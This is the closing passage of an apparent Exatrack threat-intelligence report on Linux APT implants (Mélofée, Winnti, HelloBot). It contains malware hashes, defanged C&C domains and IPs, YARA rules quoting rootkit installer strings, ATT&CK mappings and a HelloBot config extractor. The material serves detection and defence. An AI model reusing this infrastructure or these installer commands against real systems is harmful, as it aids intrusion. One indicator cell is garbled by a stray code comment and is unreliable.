<td><code>ad5bc6c4e653f88c451f6f6375516cc36a8fa03dd5a4d1412a418c91d4f9bec8</code></td>
<td>ASCII text file</td>
<td>Script dropped in <code>/etc/rc.modules</code> for rootkit persistance</td>
</tr>
<tr>
<td><code>1f9e4bfb25622eab6c33da7da9be6c51cf8bf1a284ee1c1703a3cee445bc8cd9</code></td>
<td>ELF x64 executable</td>
<td><em>Winnti</em> Linux</td>
</tr>
<tr>
<td><code>22fd67457274635db7dd679782e002009363010db66523973b4748d5778b1a2a</code></td>
<td>ELF x64 executable</td>
<td><em>Winnti</em> Linux</td>
</tr>
<tr>
<td><code>3c1842d29a3445bd3b85be486e49dba36b8b5ad55841c0ce00630cb83386881d</code></td>
<td>ELF x64 executable</td>
<td><em>Winnti</em> Linux</td>
</tr>
<tr>
<td><code>5861584bb7fa46373c1b1f83b1e066a3d82e9c10ce87539ee1633ef0f567e743</code></td>
<td>ELF x64 executable</td>
<td><em>Winnti</em> Linux rootkit</td>
</tr>
<tr>
<td><code>378acfdbcec039cfe7287faac184adf6ad525b201cf781db9082b784c9c75c99</code></td>
<td>Shell script</td>
<td><em>Winnti</em> Linux rootkit installer</td>
</tr>
<tr>
<td><code>617f9add4c27f3bb91a32fee007cce01f5a51deaf42e75e6cec3e71afe2ba967</code></td>
<td>ELF x64 executable</td>
<td><em>Winnti</em> Linux</td>
</tr>
<tr>
<td><code>69ff2f88c1f9007b80d591e9655cc61eaa4709ccd8b3aa6ec15e3aa46b9098bd</code></td>
<td>ELF x64 executable</td>
<td><em>Winnti</em> Linux</td>
</tr>
<tr>
<td><code>ad979716afbce85776251d51716aeb00665118fb350038d150c129256dd6fc5f</code></td>
<td>ELF x64 executable</td>
<td><em>Winnti</em> Linux</td>
</tr>
<tr>
<td><code>f49f1b2cc52623624fdd3d636056b8a80705f6456a3d5a676e3fb78749bdd281</code></td>
<td>ELF x64 executable</td>
<td><em>Winnti</em> Linux</td>
</tr>
<tr>
<td><code>2c1a6fe08c8cbdc904809be4c12b520888da7f33123d1656a268780a9be45e20</code></td>
<td>ELF x64 executable</td>
<td><em>Winnti</em> Linux rootkit (Azazel fork)</td>
</tr>
<tr>
<td><code>a37661830859ca440d777af0bfa829b01d276bb1f81fe14b1485fa3c09f5f286</code></td>
<td>JavaScript file</td>
<td><em>ezXSS</em> payload</td>
</tr>
</tbody>
</table>


<h4 id="filenames">Filenames</h4>
<ul>
<li><code>/etc/intel_audio</code></li>
<li><code>/etc/intel_audio/id</code></li>
<li><code>/etc/intel_audio/intel_audio.ko</code></li>
</ul>
<h4 id="network-iocs">Network IOCs</h4>





<table class="table table-striped table-bordered">
<thead>
<tr>
<th>IOC</th>
<th>Comment</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>dgbyem[.]com</code></td>
<td><em>AlienReverse</em> C&amp;C domain</td>
</tr>
<tr>
<td><code>update[.]ankining[.]com</code></td>
<td><em>Mélofée</em> C&amp;C subdomain</td>
</tr>
<tr>
<td><code>www.data-yuzefuji.com</code></td>
<td><em>Mélofée</em> C&amp;C domain</td>
</tr>
<tr>
<td><code>ssm[.]awszonwork[.]com</code></td>
<td><em>Mélofée</em> C&amp;C subdomain</td>
</tr>
<tr>
<td><code>stock[.]awszonwork[.]com</code></td>
<td><em>CobaltStrike</em> C&amp;C subdomain</td>
</tr>
<tr>
<td><code>help[.]git1ab[.]com</code></td>
<td><em>HelloBot</em> C&amp;C subdomain</td>
</tr>
<tr>
<td><code>about[.]git1ab[.]com</code></td>
<td><em>StowAway</em> and <em>Winnti</em> C&amp;C subdomain</td>
</tr>
<tr>
<td><code>www[.]git1ab[.]com</code></td>
<td>Unknown usage</td>
</tr>
<tr>
<td><code>cloudf1are[.]com</code></td>
<td><em>CobaltStrike</em> C&amp;C domain, <em>PlugX</em> staging</td>
</tr>
<tr>
<td><code>cdn[.]cloudf1are[.]com</code></td>
<td><em>HelloBot</em> C&amp;C subdomain</td>
</tr>
<tr>
<td><code>cdn2[.]cloudf1are[.]com</code></td>
<td>C&amp;C subdomain</td>
</tr>
<tr>
<td><code>cdn3[.]cloudf1are[.]com</code></td>
<td>C&amp;C subdomain</td>
</tr>
<tr>
<td><code>cdn4[.]cloudf1are[.]com</code></td>
<td>C&amp;C subdomain</td>
</tr>
<tr>
<td><code>dns[.]cloudf1are[.]com</code></td>
<td><em>PlugX</em> and <em>Winnti</em> C&amp;C subdomain</td>
</tr>
<tr>
<td><code>dns2[.]cloudf1are[.]com</code></td>
<td><em>Spark</em> C&amp;C subdomain, <em>ToDesk</em> staging</td>
</tr>
<tr>
<td><code>dev[.]yuanta[.]dev</code></td>
<td>Probable <code>Winnti</code> C&amp;C domain</td>
</tr>
<tr>
<td><code>test[.]yuanta[.]dev</code></td>
<td>Probable <code>Winnti</code> C&amp;C domain</td>
</tr>
<tr>
<td><code>us.securitycloud-symantec[.]icu</code></td>
<td><em>Winnti</em> C&amp;C domain</td>
</tr>
<tr>
<td><code>vt.livehost[.]live</code></td>
<td><em>Winnti</em> C&amp;C domain</td>
</tr>
<tr>
<td><code>156.67.208[.]192</code></td>
<td><em>Mélofée</em> C&amp;C IP</td>
</tr>
<tr>
<td><code>5.61.57[.]80</code></td>
<td><em>Mélofée</em> C&amp;C IP</td>
</tr>
<tr>
<td><code>147.139.28[.]254</code></td>
<td><em>AlienReverse</em> C&amp;C IP</td>
</tr>
<tr>
<td><code>173.209.62[.]186</code></td>
<td><em>Mélofée</em> installer staging</td>
</tr>
<tr>
<td><code>173.209.62[.]187</code></td>
<td>C&amp;C server</td>
</tr>
<tr>
<td><code>173.209.62[.]188</code></td>
<td><em>Mélofée</em> C&amp;C server and <em>Winnti</em> staging domain</td>
</tr>
<tr>
<td><code>173.209.62[.]189</code></td>
<td>C&amp;C server</td>
</tr>
<tr>
<td><code>173.209.62[.]190</code></td>
<td><em>Mélofée</em> C&amp;C IP</td>
</tr>
<tr>
<td><code>167.172.73[.]202</code></td>
<td><em>CobaltStrike, * // The data encrypted using pel_encryptShadowPad</em> and <em>HelloBot</em> C&amp;C IP</td>
</tr>
<tr>
<td><code>47.243.51[.]98</code></td>
<td><em>StowAway</em> C&amp;C IP</td>
</tr>
<tr>
<td><code>185.145.128[.]90</code></td>
<td><em>CobaltStrike</em> and <em>PlugX</em> C&amp;C IP</td>
</tr>
<tr>
<td><code>103.87.10[.]100</code></td>
<td><em>toDesk</em> staging</td>
</tr>
<tr>
<td><code>202.182.101[.]174</code></td>
<td><em>PlugX</em> C&amp;C IP</td>
</tr>
<tr>
<td><code>144.202.112[.]187</code></td>
<td><em>PlugX</em> staging</td>
</tr>
<tr>
<td><code>38.54.30[.]39</code></td>
<td><em>Winnti</em> C&amp;C IP</td>
</tr>
</tbody>
</table>


<h4 id="yara-rules">Yara rules</h4>
<pre tabindex="0"><code>rule UNK_APT_MelofeeImplant {
    meta:
        author = &#34;Exatrack&#34;
        date =   &#34;2023-03-03&#34;
        update =   &#34;2023-03-03&#34;
        description = &#34;Detects the Melofee implant&#34;
        tlp =  &#34;CLEAR&#34;
        sample_hash = &#34;a5a4284f87fd475b9474626040d289ffabba1066fae6c37bd7de9dabaf65e87a,f3e35850ce20dfc731a6544b2194de3f35101ca51de4764b8629a692972bef68,8d855c28744dd6a9c0668ad9659baf06e5e448353f54d2f99beddd21b41390b7&#34;

    strings:
        $str_melofee_implant_01 = &#34;10PipeSocket&#34;
        $str_melofee_implant_02 = &#34;ikcp_ack_push&#34;
        $str_melofee_implant_03 = &#34;TLSSocketEE&#34;
        $str_melofee_implant_04 = &#34;/tmp/%s.lock&#34;
        $str_melofee_implant_05 = &#34;neosmart::WaitForMultipleEvents&#34;
        $str_melofee_implant_06 = &#34;9TLSSocket&#34;
        $str_melofee_implant_07 = &#34;7VServer&#34;
        $str_melofee_implant_08 = &#34;N5boost6detail13sp_ms_deleterI13UdpSocketWrapEE&#34;
        $str_melofee_implant_09 = &#34;UdpServerWrap&#34;
        $str_melofee_implant_10 = &#34;KcpUpdater&#34;
        $str_melofee_implant_11 = &#34;SelfForwardServer&#34;

        $str_command_parsing_01 = {3? 01 00 05 00 ?? ?? ?? ?? 00 00 3? 01 00 05 00 ?? ?? 3? 05 00 04 00}
        $str_command_parsing_02 = {3? 04 00 04 00 ?? ?? ?? ?? 00 00 3? 04 00 04 00 ?? ?? 3? 05 00 01 00}
        $str_command_parsing_03 = {3? 01 00 07 00 ?? ?? ?? ?? 00 00 3? 01 00 09 00 ?? ?? ?? ?? ?? 00 3? 01 00 06 00 }

    condition:
        3 of them
}


rule UNK_APT_Melofee_Installer {
    meta:
        author = &#34;Exatrack&#34;
        date =   &#34;2023-03-15&#34;
        update =   &#34;2023-03-15&#34;
        description = &#34;Detects the installer for melofee malware&#34;
        score =   80
        tlp =  &#34;AMBER&#34;
        source =  &#34;Exatrack&#34;
        sample_hash = &#34;758b0934b7adddb794951d15a6ddcace1fa523e814aa40b55e2d071cf2df81f0&#34;

    strings:
        $str_melofee_installer_01 = &#34;#Script for starting modules&#34;
        $str_melofee_installer_02 = &#34;#End script&#34;
        $str_melofee_installer_03 = &#34;/etc/intel_audio/&#34;
        $str_melofee_installer_04 = &#34;rm -fr /etc/rc.modules&#34;
        $str_melofee_installer_05 = &#34;-i &lt;data file&gt;      Install&#34;
        $str_melofee_installer_06 = &#34;cteate home folder failed&#34;
        $str_melofee_installer_07 = &#34;create rootkit file failed&#34;
        $str_melofee_installer_08 = &#34;create auto start file failed&#34;
        $str_melofee_installer_09 = &#34;Remove Done!&#34; // only 3 files on VT with this :D
        $str_melofee_installer_10 = &#34;Unkown option %c\n&#34;

    condition:
        any of them
}


rule UNK_APT_Alien_Implant {
    meta:
        author = &#34;Exatrack&#34;
        date =   &#34;2023-03-03&#34;
        update =   &#34;2023-03-03&#34;
        description = &#34;Detects an unknown implant from AlienManager family, maybe related to melofee&#34;
        tlp =  &#34;CLEAR&#34;
        sample_hash = &#34;3535f45bbfafda863665c41d97d894c39277dfd9af1079581d28015f76669b88,&#34;

    strings:
        $str_alien_01 = &#34;[+]  Connect %s Successed,Start Transfer...&#34;
        $str_alien_02 = &#34;Alloc buffer to decrypt data error, length == %d.&#34;
        $str_alien_03 = &#34;pel_decrypt_msg data error, error&#34;
        $str_alien_04 = &#34;encrypt data error, length == %d.&#34;
        $str_alien_05 = &#34;DoRecvOverlapInternal error!&#34;
        $str_alien_06 = &#34;Socks Listen port is %d,Username is %s, password is %s&#34;
        $str_alien_07 = &#34;Start port mapping error! remoteAddr=%s remotePort=%d localAddr=%s localPort=%d&#34;
        $str_alien_08 = &#34;OnCmdSocksStart error!&#34;
        $str_alien_09 = &#34;The master isn&#39;t readable!&#34;
        $str_alien_10 = &#34;ConnectBypassSocks proxy:%s:%d error!&#34;
        $str_alien_11 = &#34;ConnectBypassSocks to %s %d&#34;
        $str_alien_12 = &#34;now datetime: %d-%d-%d %d:%d:%d&#34;
        $str_alien_13 = &#34;Not during working hours! Disconnect!&#34;
        $str_alien_14 = &#34;Example: ./AlienReverse --reverse-address=192.168.1.101:80 --reverse-password=123456&#34;
        $str_alien_15 = &#34;Not during working hours! Disconnect!&#34;
        $str_alien_16 = &#34;SocksManager.cpp&#34;
        $str_alien_17 = &#34;connect() in app_connect&#34;
        $str_alien_18 = &#34;They send us %hhX %hhX&#34;
        $str_alien_19 = &#34;your input directory is not exist!&#34;
        $str_alien_20 = &#34;Send data to local error ==&gt; %d.\n&#34;

    condition:
        any of them
}
</code></pre><h4 id="attck-techniques-used">ATT&amp;CK Techniques used</h4>
<ul>
<li>T1583.001 - Attackers acquired servers for staging and command &amp; control</li>
<li>T5183.004 - Attackers acquired domains</li>
<li>T1071.001 - Attacker uses application layer protocols as C2</li>
<li>T1587.001 - Adversary develop custom malware to achieve its attacks</li>
<li>T1037.004 - Adversary uses RC scripts as persistance</li>
<li>T1059.004 - Attacker uses Unix shell commands and scripts</li>
<li>T1132.002 - Non standard encoding using KCP</li>
<li>T1573.001 - Attacker uses RC4 to encrypt its C2 traffic</li>
<li>T1083 - File and directory discovery</li>
<li>T1592.002 - Attacker discovers the installed version of the Linux distribution</li>
<li>T1564.001 - Adversary hides the files using a rootkit</li>
<li>T1562.003 - Adversary disables the shell history when executing a command</li>
<li>T1070.004 - Adversary can remove the implant, the rootkit and its configuratin from the system</li>
<li>T1599.001 - Adversary can modify thze firewall rules of the compromised host</li>
<li>T1095 - Adversary can use UDP as a communication layer</li>
<li>T1571 - Adversary can use alternative ports for communication</li>
<li>T1027.002 - HelloBot implants are packed using UPX with the configuration appended</li>
<li>T1027.007 - Adversary payloads are stripped</li>
<li>T1588.001 - Adversary may buy or download malware</li>
<li>T1588.002 - Adversary may buy or download tools such as Cobalt Strike</li>
<li>T1057 - Adversary may list the processes executing on the compromised host</li>
<li>T1572 - Adversary may tunnel network communications</li>
<li>T1090 - Adversary may use a connection proxy for accessing internal ressources</li>
<li>T1014 - Adversary uses a rootkit</li>
<li>T1608.001 - Adversary uploads its malware on its infrastructure for deploying</li>
<li>T1608.002 - Adversary uploads its tools on its infrastructure</li>
<li>T1082 - Adversary gets detailed information about the compromised host such as the operating system version</li>
<li>T1497.003 - Adversary uses time-based methods to avoid detection</li>
</ul>
<h4 id="hellobot-configuration-extraction-script">HelloBot configuration extraction script</h4>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#75715e">#!/usr/bin/env python3</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># encoding: utf-8</span>
</span></span><span style="display:flex;"><span><span style="color:#e6db74">&#34;&#34;&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">   Hello Bot configuration extractor
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    (c) 2023 Exatrack
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#34;&#34;&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> sys
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> argparse
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> struct
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">decrypt_config</span>(config):
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;&#34;&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Decrypts hellobot configuration
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    &#34;&#34;&#34;</span>
</span></span><span style="display:flex;"><span>    old_char <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>    out <span style="color:#f92672">=</span> []
</span></span><span style="display:flex;"><span>    key <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;ecfafeab6ee7d642&#39;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span> index, car <span style="color:#f92672">in</span> enumerate(config):
</span></span><span style="display:flex;"><span>        bVar1 <span style="color:#f92672">=</span> old_char <span style="color:#f92672">^</span> key[index<span style="color:#f92672">%</span>len(key)]
</span></span><span style="display:flex;"><span>        dec_car <span style="color:#f92672">=</span> bVar1 <span style="color:#f92672">^</span> car
</span></span><span style="display:flex;"><span>        old_char <span style="color:#f92672">=</span> car
</span></span><span style="display:flex;"><span>        out<span style="color:#f92672">.</span>append(dec_car)
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> bytes(bytearray(out))
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">get_config</span>(data):
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;&#34;&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Extract the pointer to the configuration
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    &#34;&#34;&#34;</span>
</span></span><span style="display:flex;"><span>    offset <span style="color:#f92672">=</span> struct<span style="color:#f92672">.</span>unpack(<span style="color:#e6db74">&#39;I&#39;</span>, data[<span style="color:#f92672">-</span><span style="color:#ae81ff">4</span>:])[<span style="color:#ae81ff">0</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> offset <span style="color:#f92672">&gt;</span> len(data)<span style="color:#f92672">-</span><span style="color:#ae81ff">4</span>:
</span></span><span style="display:flex;"><span>        print(<span style="color:#e6db74">&#34;[!] Error, cannot find offset, probably not a packed Hellobot sample&#34;</span>)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">raise</span> <span style="color:#a6e22e">IOError</span>
</span></span><span style="display:flex;"><span>    config <span style="color:#f92672">=</span> data[<span style="color:#f92672">-</span>offset<span style="color:#f92672">-</span><span style="color:#ae81ff">4</span>:<span style="color:#f92672">-</span><span style="color:#ae81ff">4</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;[main]&#39;</span> <span style="color:#f92672">in</span> config:
</span></span><span style="display:flex;"><span>        print(<span style="color:#e6db74">&#34;[x] Success, found hellobot configuration&#34;</span>)
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span>offset<span style="color:#f92672">-</span><span style="color:#ae81ff">4</span>, config
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">extract_hellobot</span>(fname):
</span></span><span style="display:flex;"><span>    packed_data <span style="color:#f92672">=</span> open(fname, <span style="color:#e6db74">&#39;rb&#39;</span>)<span style="color:#f92672">.</span>read()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    offset, config <span style="color:#f92672">=</span> get_config(packed_data)
</span></span><span style="display:flex;"><span>    to_unpack <span style="color:#f92672">=</span> packed_data[:offset]
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">with</span> open(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">{</span>fname<span style="color:#e6db74">}</span><span style="color:#e6db74">_config&#34;</span>, <span style="color:#e6db74">&#34;wb&#34;</span>) <span style="color:#66d9ef">as</span> of:
</span></span><span style="display:flex;"><span>        of<span style="color:#f92672">.</span>write(config)
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">with</span> open(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">{</span>fname<span style="color:#e6db74">}</span><span style="color:#e6db74">_config_decrypted&#34;</span>, <span style="color:#e6db74">&#34;wb&#34;</span>) <span style="color:#66d9ef">as</span> of:
</span></span><span style="display:flex;"><span>        of<span style="color:#f92672">.</span>write(decrypt_config(config))
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">with</span> open(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">{</span>fname<span style="color:#e6db74">}</span><span style="color:#e6db74">_packed&#34;</span>, <span style="color:#e6db74">&#34;wb&#34;</span>) <span style="color:#66d9ef">as</span> of:
</span></span><span style="display:flex;"><span>        of<span style="color:#f92672">.</span>write(to_unpack)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">main</span>():
</span></span><span style="display:flex;"><span>    parser <span style="color:#f92672">=</span> argparse<span style="color:#f92672">.</span>ArgumentParser(description<span style="color:#f92672">=</span>sys<span style="color:#f92672">.</span>modules[__name__]<span style="color:#f92672">.</span>__doc__)
</span></span><span style="display:flex;"><span>    parser<span style="color:#f92672">.</span>add_argument(<span style="color:#e6db74">&#34;filename&#34;</span>, help<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;The filename of the sample to unpack&#34;</span>)
</span></span><span style="display:flex;"><span>    args <span style="color:#f92672">=</span> parser<span style="color:#f92672">.</span>parse_args()
</span></span><span style="display:flex;"><span>    extract_hellobot(args<span style="color:#f92672">.</span>filename)
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> __name__ <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;__main__&#34;</span>:
</span></span><span style="display:flex;"><span>    main()
</span></span></code></pre></div><div class="footnotes" role="doc-endnotes">
<hr>
<ol>
<li id="fn:1">
<p><a href="https://github.com/f0rb1dd3n/Reptile">https://github.com/f0rb1dd3n/Reptile</a>&#160;<a href="#fnref:1" class="footnote-backref" role="doc-backlink">&#x21a9;&#xfe0e;</a>&#160;<a href="#fnref1:1" class="footnote-backref" role="doc-backlink">&#x21a9;&#xfe0e;</a></p>
</li>
<li id="fn:2">
<p><a href="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/5/html/deployment_guide/s1-kernel-modules-persistant">https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/5/html/deployment_guide/s1-kernel-modules-persistant</a>&#160;<a href="#fnref:2" class="footnote-backref" role="doc-backlink">&#x21a9;&#xfe0e;</a></p>
</li>
<li id="fn:3">
<p><a href="https://github.com/skywind3000/kcp">https://github.com/skywind3000/kcp</a>&#160;<a href="#fnref:3" class="footnote-backref" role="doc-backlink">&#x21a9;&#xfe0e;</a></p>
</li>
<li id="fn:4">
<p><a href="https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf">https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf</a>&#160;<a href="#fnref:4" class="footnote-backref" role="doc-backlink">&#x21a9;&#xfe0e;</a>&#160;<a href="#fnref1:4" class="footnote-backref" role="doc-backlink">&#x21a9;&#xfe0e;</a></p>
</li>
<li id="fn:5">
<p><a href="https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/">https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/</a>&#160;<a href="#fnref:5" class="footnote-backref" role="doc-backlink">&#x21a9;&#xfe0e;</a></p>
</li>
<li id="fn:6">
<p><a href="https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf">https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf</a>&#160;<a href="#fnref:6" class="footnote-backref" role="doc-backlink">&#x21a9;&#xfe0e;</a>&#160;<a href="#fnref1:6" class="footnote-backref" role="doc-backlink">&#x21a9;&#xfe0e;</a></p>
</li>
<li id="fn:7">
<p><a href="https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a">https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a</a>&#160;<a href="#fnref:7" class="footnote-backref" role="doc-backlink">&#x21a9;&#xfe0e;</a>&#160;<a href="#fnref1:7" class="footnote-backref" role="doc-backlink">&#x21a9;&#xfe0e;</a></p>
</li>
<li id="fn:8">
<p><a href="https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan">https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan</a>&#160;<a href="#fnref:8" class="footnote-backref" role="doc-backlink">&#x21a9;&#xfe0e;</a></p>
</li>
<li id="fn:9">
<p><a href="https://github.com/XZB-1248/Spark">https://github.com/XZB-1248/Spark</a>&#160;<a href="#fnref:9" class="footnote-backref" role="doc-backlink">&#x21a9;&#xfe0e;</a></p>
</li>
<li id="fn:10">
<p><a href="https://github.com/ph4ntonn/Stowaway">https://github.com/ph4ntonn/Stowaway</a>&#160;<a href="#fnref:10" class="footnote-backref" role="doc-backlink">&#x21a9;&#xfe0e;</a></p>
</li>
<li id="fn:11">
<p><a href="https://github.com/ssl/ezXSS">https://github.com/ssl/ezXSS</a>&#160;<a href="#fnref:11" class="footnote-backref" role="doc-backlink">&#x21a9;&#xfe0e;</a></p>
</li>
<li id="fn:12">
<p><a href="http://rootkiter.com/EarthWorm/">http://rootkiter.com/EarthWorm/</a>&#160;<a href="#fnref:12" class="footnote-backref" role="doc-backlink">&#x21a9;&#xfe0e;</a></p>
</li>
<li id="fn:13">
<p><a href="https://github.com/fgssfgss/socks_proxy">https://github.com/fgssfgss/socks_proxy</a>&#160;<a href="#fnref:13" class="footnote-backref" role="doc-backlink">&#x21a9;&#xfe0e;</a></p>
</li>
<li id="fn:14">
<p><a href="https://blog.csdn.net/weixin_29100927/article/details/116577862">https://blog.csdn.net/weixin_29100927/article/details/116577862</a>&#160;<a href="#fnref:14" class="footnote-backref" role="doc-backlink">&#x21a9;&#xfe0e;</a></p>
</li>
</ol>
</div>
        </div>
        
    </article>



	<footer>
    <div class="container">
        <div class="row" id="contact">
            <div class="col-lg-8 col-lg-offset-2 text-center">
                <h2 class="section-heading">Contactez nous !</h2>
                <hr class="primary">
                <p>Pour plus d'informations sur l'un de nos services n'hésitez pas à nous contacter, nous vous détaillerons nos activités avec plaisir.</p>
            </div>
        </div>
        <div class="row">
            <div class="col-md-2 text-center">
            </div>
            <div class="col-md-3 col-offset-md-3 text-center">
                <i class="fa fa-envelope-o fa-3x sr-contact"></i>
                <p>contact [at] exatrack [dot] com</p>
            </div>
            <div class="col-md-3 text-center">
                <i class="fa fa-twitter-square fa-3x sr-contact"></i>
                <p><a href="https://twitter.com/ExaTrack">@ExaTrack</a></p>
            </div>
            <div class="col-md-3 text-center">
                <i class="fa fa-linkedin-square fa-3x sr-contact"></i>
                <p><a href="https://www.linkedin.com/company/exatrack/">ExaTrack</a></p>
            </div>

            <div class="col-md-2 text-center">
            </div>
        </div>

        <div class="row">
                <div class="col-lg-3 col-lg-offset-2 text-center">
                    <i class="fa fa-file-pdf-o fa-3x sr-contact"></i>
                    <p><a href="https://exatrack.com/CERT-Exatrack-RFC2350.pdf"> CERT-Exatrack RFC2350</a></p>
                </div>

                <div class="col-lg-3 text-center">
                    <i class="fa fa-key fa-3x sr-contact"></i>
                    <p><a href="https://exatrack.com/public.asc">CERT-Exatrack public key</a></p>
                </div>
                <div class="col-lg-3 text-center">
                    <i class="fa fa-solid fa-check fa-3x"></i>
                    <p><a href="https://exatrack.com/public.asc">RFC2350 signature</a></p>
                </div>
        </div>
        <br>

        <div class="row">
                <div class="col-lg-8 col-lg-offset-2 text-center">
                    <p><a href="https://exatrack.com/mentions_legales.txt">Mentions légales</a></p>

                    <p>&copy; 2023 <a href="https://blog.exatrack.com">Exatrack</a></p>
                </div>
        </div>

    </div>
</footer>

</body>
</html>
